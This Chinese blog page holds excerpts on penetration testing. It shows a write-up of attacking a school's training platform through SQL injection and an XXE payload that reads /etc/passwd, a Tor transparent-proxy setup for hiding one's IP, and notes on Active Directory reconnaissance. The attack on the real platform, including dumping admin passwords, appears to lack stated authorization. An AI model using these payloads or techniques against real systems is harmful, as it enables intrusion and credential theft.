Pentest

某天工作室小伙伴发了个某学校培训平台的URL给我说有注入，于是我们俩就开始了愉快的渗（mo）透（yu）旅程 0x00 从注入摸到XXE 首先这个站有一个学生登录口和一个管理登录口： 自然是先用学生身份注册一个账号，进去之后到处摸，然后在课程支付的地方找到一个注入点 因为这个培训平台的所有课程都是付费的，所以首先需要支付才能进行学习。在点击支付后会生成一个支付记录，然后跳转至另一个外部网站进行支付过程。然后就找到一个支付记录查询的页面： 对应HTTP包抓一下，发现user_course_id参数有注入： GET /student/apply/uc/uc_pay_log_list.jsp?user_course_id=1102089&returl=uc%5fuser%5fcourse%5flist%2ejsp&13952 HTTP/1.1 Host: xxx Cookie: xxx Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90" Sec-Ch-Ua-Mobile: ?0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: iframe Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close 是一个MSSQL的bool盲注，数据库用户也是DBA，但是由于不知名原因没法堆叠注入，所以没法直接os-shell 然后跑一手admin表，直接出用户名密码（好家伙，密码直接明文保存） 然后用户名和密码登录管理界面，功能比学生的界面多了很多，可以系统的一些信息，发现Web是root起的 接着在里面乱摸，又摸到了几个注入点，但是由于已经注完了没什么用 然后有两个富文本编辑器ueditor和kindeditor，前者无洞，后者有可以上传HTML的JSP但是没解析，访问直接就下载了，研究了很久，无果 各种上传点也试了，限制得太死了没法绕过 然后找到在学习平台里面有个题目管理，每门课里面都有个在线练习，里面的题目配置长这样： 这不XML嘛，于是果断试一下XXE得不得行 编辑题目抓包，修改题目的XML数据，添加恶意实体： <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE items [ <!ENTITY goodies SYSTEM "file:///etc/passwd"> ]> <items> <item><serial>1</serial><answer>0</answer><title>&goodies;</title></item> <item><serial>2</serial><answer>1</answer><title><!...

透明代理的意思是：客户端根本不需要知道有代理服务器的存在，只需要配置好网络即可实现代理功能，其经常用于渗透测试中，作用除去本文提到的Tor隐藏IP之外，还可以用于内网渗透，使得主机如同真正处于内网之中一样，使我们的渗透更加方便顺利。 本文的目标场景：一台主机作为网关，在该主机上搭建Tor服务并做好流量转发，实现所有以该主机网关的机器均可以直接访问Tor（不需要任何代理设置）。 由于Tor本质上是个SOCKS代理，所以理论上本文的内容对于所有的SOCKS代理均适用。 Tor的安装&配置 安装Tor： # CentOS sudo yum install epel-release sudo yum install tor # Ubuntu, Kali sudo apt install tor 修改Tor配置文件/etc/tor/torrc： # 定义Tor监听的SOCKS端口 SOCKSPort 9050 # 屏蔽五眼联盟国家节点 ExcludeNodes {fr} ExcludeExitNodes {us},{au},{ca},{nz},{gb},{fr} 启动Tor服务并设置为开机启动： sudo systemctl start tor sudo systemctl enable tor Redsocks的安装&配置 仓库：GitHub - darkk/redsocks: transparent TCP-to-proxy redirector sudo yum install libevent-devel git gcc # 安装依赖 git clone darkk/redsocks cd redsocks make # 编译源代码 cp redsocks/redsocks /sbin # 放置在任意包含在环境变量的路径中即可，便于后续输入命令 创建配置文件/etc/redsocks....

第一章 内网渗透测试基础 内网基础知识 工作组 对局域网中的计算机进行分类，使得网络更有序。计算机的管理依然是各自为政，所有计算机依然是对等的，松散会员制，可以随意加入和退出，且不同工作组之间的共享资源可以相互访问。 域 “域”是一个有安全边界的计算机组合（一个域中的用户无法访问另一个域中的资源），域内资源由一台域控制器（Domain Controller，DC）集中管理，用户若想访问域内资源必须进行身份验证。当计算机连接到域时，域控制器首先需要鉴别计算机是否属于这个域，再确定用户名和密码是否正确，若全部正确则让其登录。 单域：即只有一个域的网络环境，一般需要两台DC，一台DC，另一台备用DC（容灾） 父子域：类比公司总部和公司分部的关系，总部的域称为父域，各分部的域称为该域的子域。 使用父子域的好处： 减小了域之间信息交互的压力（域内信息交互不会压缩，域间信息交互可压缩） 不同的子域可以指定特定的安全策略 父子域中域名使用一个.表示一个层次，类似于DNS域名表示方式，子域只能使用父域的名字作为域名后缀 域树：多个域通过建立信任关系组成的集合。若两个域之间需要相互访问，需要建立信任关系（Trust Relation），通过信任关系可以将父子域连接成树状结构。 域森林：多个域树通过建立信任关系组成的集合。 域名服务器：实现域名到IP地址的转换。由于域中计算机使用DNS来定位DC、服务器和其他计算机的，所以域的名字就是DNS域的名字。 内网渗透中，大都是通过寻找DNS服务器来确定域控制器位置（因为DNS服务器和域控制器通常配置在一台机器上） 活动目录 活动目录（Active Directory，AD）是指域环境中提供目录服务的组件，用于存储有关网络对象（用户、组、计算机、共享资源、联系人）的信息。基于活动目录有目录服务，用于帮助用户从活动目录中快速找到所需的消息。活动目录使得企业可以对网络环境进行集中管理。（可类比为内网中的索引，里面存储有内网里所有资源的快捷方式） 活动目录的逻辑结构包含组织单元、域、域树、域森林。域树内的所有域共享一个活动目录，因此非常适合进行统一管理。 活动目录的功能： 账号集中管理 软件集中管理 环境集中管理 增强安全性 更可靠、更短的宕机时间 **域和活动目录的区别：**要实现域环境，其实就是要安装AD。一台计算机安装了AD之后就变成了DC。 安全域的划分 在一个用路由器连接的内网中，可以将网络划分为3个区域： 内网（安全级别最高）：分为核心区（存储企业最重要的数据，只有很少的主机能够访问）和办公区（员工日常工作区，一般能够访问DMZ，部分主机可以访问核心区） DMZ（Demilitarized Zone，边界网络，隔离区，安全级别中等）：作为内网中安全系统和非安全系统之间的缓冲区，用于对外提供服务，一般可以放置一些必须公开的服务器设施 外网（Internet，安全级别最低） 拥有DMZ的网络需要制定一些访问控制策略： 内网可以访问外网，可以访问DMZ 外网不能访问内网（若要访问可以通过VPN进行），只能访问DMZ DMZ不能访问内网（否则内网无法受到保护），也不能访问外网（存在例外，如邮件服务器等需要访问外网的服务） 域中计算机的分类 域控制器：用于管理所有的网络访问，存储有域内所有的账户和策略信息。允许网络中拥有多台域控制器（容灾） 成员服务器：安装了服务器操作系统并加入了域，但没有安装活动目录的计算机，主要任务是提供网络资源 客户机：安装了其他操作系统的计算机，利用这些计算机和域中的账户就可以登录到域。 独立服务器：和域无关，既不加入域，也没有活动目录 域内权限 域本地组：多域用户访问单域资源（访问同一个域），主要用于授予本域内资源的访问权限，可以从任何域中添加用户账号、通用组和全局组。域本地组无法嵌套在其他组中 全局组：单域用户访问多域资源（必须是同一个域中的用户），只能在创建该全局组的域中添加用户和全局组，但可以在域森林中的任何域内指派权限，也可以嵌套在其他组中 通用组：多域用户访问多域资源，成员信息不保存在域控制器中，而是保存在全局编录（GC）中，任何变化都会导致全林复制 A-G-DL-P策略：Account–Global–Universal Group–Domain Local Group–Permission，先将用户账号添加至全局组中，再将全局组添加至域本地组中，然后为域本地组分配资源权限。 下图为Windows Server 2012 中Users组织单元中的内置组： 搭建内网环境 域控制器主机使用服务器管理器安装“DNS”和“Active Directory域服务”两个功能，然后修改机器IP为固定IP，并修改DNS服务器为自身。安装好功能之后Win+R输入dsa.msc打开活动目录管理界面创建一个新的域用户 其他机器在计算机名/域更改窗口内将域修改为之前创建的域即可 使用net view /domain:域名来查看域内主机： 第二章 内网信息收集 进入内网后，首先需要对当前网络环境进行判断： 我是谁：当前机器的角色 这是哪：当前机器所处网络环境的拓扑结构 我在哪：当前机器所处的区域 收集本机信息 手动收集信息 包括操作系统、权限、内网IP地址段、杀毒软件、端口、服务、补丁更新频率、网络连接、共享、会话等。...